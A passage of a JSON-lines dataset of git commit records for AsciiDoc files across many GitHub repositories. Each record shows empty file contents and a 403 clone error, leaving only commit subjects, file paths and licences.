2010-05-16-Le-zoo-est-ouvert.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-05-16-Le-zoo-est-ouvert.adoc","new_file":"_posts\/2010-05-16-Le-zoo-est-ouvert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c6364e53e0431e4d2a31dcdc0dbb2eaf0a7c44d","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6beb2185908e25faec78806e98b5f056ab32d21f","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc828b3a3a5f79c761fc1f7bdca6eb94a7b566aa","subject":"0~_posts\/about.adoc1~","message":"0~_posts\/about.adoc1~\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/about.adoc","new_file":"_posts\/about.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42e15c386f35a8fe9cd5e86450082237ae182de4","subject":"Adding blog post about using the container image with KRaft mode","message":"Adding blog post about using the container image with KRaft mode\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-08-31-going-zookeeperless-with-debezium-container-image-for-apache-kafka.adoc","new_file":"_posts\/2021-08-31-going-zookeeperless-with-debezium-container-image-for-apache-kafka.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83092076ae87d0564aa9ccd0bedd1f766d954fba","subject":"DBZ-4260 Blog post for Debezium UI topic auto-creation","message":"DBZ-4260 Blog post for Debezium UI topic auto-creation\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-12-01-debezium-ui-topic-groups.adoc","new_file":"_posts\/2021-12-01-debezium-ui-topic-groups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6840e2a887a571b2df4ee751cf339772e9102a2c","subject":"Update README filr from .md to .adoc (#15)","message":"Update README filr from .md to .adoc (#15)\n\n","repos":"sanbornsen\/fabric8-planner,ldimaggi\/fabric8-planner,fabric8io\/fabric8-planner,nimishamukherjee\/fabric8-planner,pmuir\/fabric8-planner,michaelkleinhenz\/fabric8-planner,fabric8-ui\/fabric8-ui,pranavgore09\/fabric8-planner,sanbornsen\/fabric8-planner,sanbornsen\/fabric8-planner,mindreeper2420\/fabric8-planner,almighty\/almighty-ui,pmuir\/fabric8-planner,vikram-raj\/fabric8-planner,fabric8io\/fabric8-ui,nimishamukherjee\/fabric8-planner,almighty\/almighty-ui,michaelkleinhenz\/fabric8-planner,mindreeper2420\/fabric8-planner,nimishamukherjee\/almighty-ui,ldimaggi\/fabric8-planner,ldimaggi\/fabric8-planner,ldimaggi\/fabric8-planner,fabric8io\/fabric8-planner,nimishamukherjee\/almighty-ui,pmuir\/fabric8-planner,sanbornsen\/fabric8-planner,pranavgore09\/fabric8-planner,fabric8-ui\/fabric8-ui,nimishamukherjee\/almighty-ui,debloper\/fabric8-planner,fabric8io\/fabric8-ui,almighty\/almighty-ui,pranavgore09\/fabric8-planner,nimishamukherjee\/fabric8-planner,nimishamukherjee\/almighty-ui,pmuir\/fabric8-planner,vikram-raj\/fabric8-planner,sanbornsen\/fabric8-planner,fabric8io\/fabric8-planner,fabric8io\/fabric8-planner,debloper\/fabric8-planner,fabric8-ui\/fabric8-ui,almighty\/almighty-ui,michaelkleinhenz\/fabric8-planner,fabric8io\/fabric8-planner,mindreeper2420\/fabric8-planner,almighty\/almighty-ui,pranavgore09\/fabric8-planner,fabric8-ui\/fabric8-ui,michaelkleinhenz\/fabric8-planner,mindreeper2420\/fabric8-planner,vikram-raj\/fabric8-planner,debloper\/fabric8-planner,vikram-raj\/fabric8-planner,fabric8io\/fabric8-ui,pmuir\/fabric8-planner,nimishamukherjee\/fabric8-planner,fabric8io\/fabric8-ui,fabric8io\/fabric8-ui,fabric8-ui\/fabric8-ui,debloper\/fabric8-planner","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nimishamukherjee\/fabric8-planner.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a971ac979a03ff408d6f01b51d86628a7d18d5ed","subject":"Added README","message":"Added README\n","repos":"unbroken-dome\/gradle-gitversion-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/unbroken-dome\/gradle-gitversion-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38b124f85f39eb7938fe76b3ea47449a4aed5861","subject":"update","message":"update\n","repos":"ZihoRo\/gitbook-plugin-asciidoc-include","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ZihoRo\/gitbook-plugin-asciidoc-include.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"122056b72c8f04a9218cb020d92b3023122c02d3","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"merose\/diff_drive","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/merose\/diff_drive.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"7c89fa799c29d7c7a00f7e5a38f4fdde81db5ea3","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"pryme\/SimplePID,merose\/SimplePID","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pryme\/SimplePID.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"04718cab9045572c0f1f1584a297892e5e0d7a70","subject":"Link to Authentication","message":"Link to Authentication\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Graded exercices.adoc","new_file":"Git\/Graded exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8debc892bba5186f6d5454589d11321fa12e919a","subject":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","message":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"634c6f0888119ff04b690c21039defa974d58d71","subject":"Update 2017-01-17-Persimmon-and-Rum-Porridge.adoc","message":"Update 2017-01-17-Persimmon-and-Rum-Porridge.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2017-01-17-Persimmon-and-Rum-Porridge.adoc","new_file":"_posts\/2017-01-17-Persimmon-and-Rum-Porridge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c37712bee149aa31f34f6a9f2dee5087348c509","subject":"Update 2017-10-11-use-storage-service-safely.adoc","message":"Update 2017-10-11-use-storage-service-safely.adoc","repos":"wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io,wushaobo\/wushaobo.github.io","old_file":"_posts\/2017-10-11-use-storage-service-safely.adoc","new_file":"_posts\/2017-10-11-use-storage-service-safely.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wushaobo\/wushaobo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8d19bff64081d17339d173fe3588702dc1c2a7a","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45237f607fd327c6d596e8861f13268f21b00e26","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e04c5ab847cff6c78e7986ecc018bfd977e743e0","subject":"FORGE-957: Added README.asciidoc","message":"FORGE-957: Added README.asciidoc\n","repos":"stalep\/forge-core,D9110\/core,agoncal\/core,ivannov\/core,pplatek\/core,ivannov\/core,ivannov\/core,agoncal\/core,ivannov\/core,agoncal\/core,D9110\/core,agoncal\/core,pplatek\/core,ivannov\/core,ivannov\/core,stalep\/forge-core,oscerd\/core,ivannov\/core,agoncal\/core,pplatek\/core,forge\/core,D9110\/core,forge\/core,oscerd\/core,oscerd\/core,pplatek\/core,oscerd\/core,D9110\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,jerr\/jbossforge-core,forge\/core,D9110\/core,jerr\/jbossforge-core,oscerd\/core,forge\/core,ivannov\/core,forge\/core,forge\/core,ivannov\/core,forge\/core,forge\/core,pplatek\/core,agoncal\/core,oscerd\/core,jerr\/jbossforge-core,pplatek\/core,ivannov\/core,D9110\/core,pplatek\/core,jerr\/jbossforge-core,oscerd\/core,oscerd\/core,pplatek\/core,jerr\/jbossforge-core,agoncal\/core,forge\/core,pplatek\/core,D9110\/core,agoncal\/core,D9110\/core,D9110\/core,pplatek\/core,oscerd\/core,jerr\/jbossforge-core,agoncal\/core,jerr\/jbossforge-core,D9110\/core,jerr\/jbossforge-core,forge\/core,agoncal\/core,oscerd\/core","old_file":"stacks\/README.asciidoc","new_file":"stacks\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/D9110\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e11070bcfaed301d1c0e9358518eebacd9f9992e","subject":"Fix macros in changelog (#30269)","message":"Fix macros in changelog (#30269)\n\nremove comments for macros which caused macros not to work correctly\r\n","repos":"uschindler\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/CHANGELOG.asciidoc","new_file":"docs\/CHANGELOG.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cb93e408123d6d18798c23286b2dd2479d1d30c","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2893b67646632f99b073e2c75ebec3522ef8e5cd","subject":"Update 201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Update 201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"_posts\/201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56e2e31c81476ebcde709525e6ee549d91e16c8e","subject":"Update 2016-02-11-Curso-Alura-Javascript-Review.adoc","message":"Update 2016-02-11-Curso-Alura-Javascript-Review.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2016-02-11-Curso-Alura-Javascript-Review.adoc","new_file":"_posts\/2016-02-11-Curso-Alura-Javascript-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2985d26d321c7cc5fe733697a2506330abea572","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"109ac1bff970c70902fe7cf85b11594998312e6d","subject":"MAILBOX-234 Documentation of JSON structure","message":"MAILBOX-234 Documentation of JSON structure\n\ngit-svn-id: 3e91be830998880cf64a843733475f92c6afa332@1688111 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"tools4origins\/james-mailbox,rouazana\/james-mailbox,linagora\/james-mailbox,mbaechler\/james-mailbox,aduprat\/james-mailbox","old_file":"elasticsearch\/jsonStructure.adoc","new_file":"elasticsearch\/jsonStructure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aduprat\/james-mailbox.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"47c88d0f28bf2a32187ea5e2bd4c6b28cc72d70c","subject":"Create README.adoc","message":"Create README.adoc","repos":"nmcl\/golang","old_file":"example\/src\/README.adoc","new_file":"example\/src\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmcl\/golang.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"063c1c32639d17fc91e25753db0366525c3707c4","subject":"Update 2017-04-01-image-File-Reader.adoc","message":"Update 2017-04-01-image-File-Reader.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-01-image-File-Reader.adoc","new_file":"_posts\/2017-04-01-image-File-Reader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0879faddd403e8b80629bb81368f92e1cc5f4bd","subject":"Update 2017-05-18-I-want-faster-IDE.adoc","message":"Update 2017-05-18-I-want-faster-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-18-I-want-faster-IDE.adoc","new_file":"_posts\/2017-05-18-I-want-faster-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f66f4ca2fc60ab8fe1fd85f17e751e1b2f0bb92","subject":"Update 2097-1-1-Puzzle-4-No-Hacking.adoc","message":"Update 2097-1-1-Puzzle-4-No-Hacking.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2097-1-1-Puzzle-4-No-Hacking.adoc","new_file":"_posts\/2097-1-1-Puzzle-4-No-Hacking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc73c82170393f36a311cd558bf3177df8160c99","subject":"y2b create post PS3 PULSE Wireless Stereo Headset Elite Edition Unboxing (New PlayStation 3 Wireless Gaming Headset)","message":"y2b create post PS3 PULSE Wireless Stereo Headset Elite Edition Unboxing (New PlayStation 3 Wireless Gaming Headset)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-28-PS3-PULSE-Wireless-Stereo-Headset-Elite-Edition-Unboxing-New-PlayStation-3-Wireless-Gaming-Headset.adoc","new_file":"_posts\/2012-09-28-PS3-PULSE-Wireless-Stereo-Headset-Elite-Edition-Unboxing-New-PlayStation-3-Wireless-Gaming-Headset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"834e293e962590e4bf73611d337d932807464baf","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b116026907e778e9d777a72073754378c1a48c04","subject":"Update 2018-08-29-ECU.adoc","message":"Update 2018-08-29-ECU.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-08-29-ECU.adoc","new_file":"_posts\/2018-08-29-ECU.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50560b34a1289436606014352750637260404288","subject":"[HWKMETRICS-334] Add limit and order documentation.","message":"[HWKMETRICS-334] Add limit and order documentation.\n","repos":"jotak\/hawkular-metrics,pilhuhn\/rhq-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,tsegismont\/hawkular-metrics,hawkular\/hawkular-metrics,mwringe\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,jotak\/hawkular-metrics,pilhuhn\/rhq-metrics,jotak\/hawkular-metrics,ppalaga\/hawkular-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,mwringe\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,burmanm\/hawkular-metrics,tsegismont\/hawkular-metrics,ppalaga\/hawkular-metrics","old_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1cd0911d9fccdb2167a69f020d7ee415e0f46d3d","subject":"Update 2015-09-22-Een-nieuw-blog.adoc","message":"Update 2015-09-22-Een-nieuw-blog.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-09-22-Een-nieuw-blog.adoc","new_file":"_posts\/2015-09-22-Een-nieuw-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f49ae6c81b7a7074e71bf07cac104a178231cf86","subject":"release notes 6.3","message":"release notes 6.3\n","repos":"oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,psiroky\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca7738aac6421d5260d3e785bb3e01c1af7e42a4","subject":"add asciidoc readme","message":"add asciidoc readme\n","repos":"beyama\/winter,beyama\/winter,beyama\/winter","old_file":"doc\/readme.adoc","new_file":"doc\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beyama\/winter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9f3bc9a703871047bf3e6f59aaa68fad43e44b2","subject":"Update 2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","message":"Update 2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","new_file":"_posts\/2016-07-01-MIXED-REALITY-Emerging-Trend-in-Computing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c56f535334e11657945df45f4c4e78160307dbea","subject":"Update 2016-12-20-this-is-test.adoc","message":"Update 2016-12-20-this-is-test.adoc","repos":"xfarm001\/xfarm001.github.io,xfarm001\/xfarm001.github.io,xfarm001\/xfarm001.github.io,xfarm001\/xfarm001.github.io","old_file":"_posts\/2016-12-20-this-is-test.adoc","new_file":"_posts\/2016-12-20-this-is-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xfarm001\/xfarm001.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dd5beec7d91e8ca8f0d00dbc2838f752a8aeac9","subject":"y2b create post Call of Duty Black Ops 2 Care Package Unboxing (COD Black Ops II Special Edition)","message":"y2b create post Call of Duty Black Ops 2 Care Package Unboxing (COD Black Ops II Special Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-13-Call-of-Duty-Black-Ops-2-Care-Package-Unboxing-COD-Black-Ops-II-Special-Edition.adoc","new_file":"_posts\/2012-11-13-Call-of-Duty-Black-Ops-2-Care-Package-Unboxing-COD-Black-Ops-II-Special-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14166032b3a922fb400be398c3e1db8451dd927f","subject":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","message":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84f04b98e3f9f95699991e40d3667850fbe4c249","subject":"y2b create post The Fastest WiFi I've Tested...","message":"y2b create post The Fastest WiFi I've Tested...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-15-The-Fastest-WiFi-Ive-Tested.adoc","new_file":"_posts\/2016-08-15-The-Fastest-WiFi-Ive-Tested.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1370eee4bceb6e73d94e113de4340ae15b42475d","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 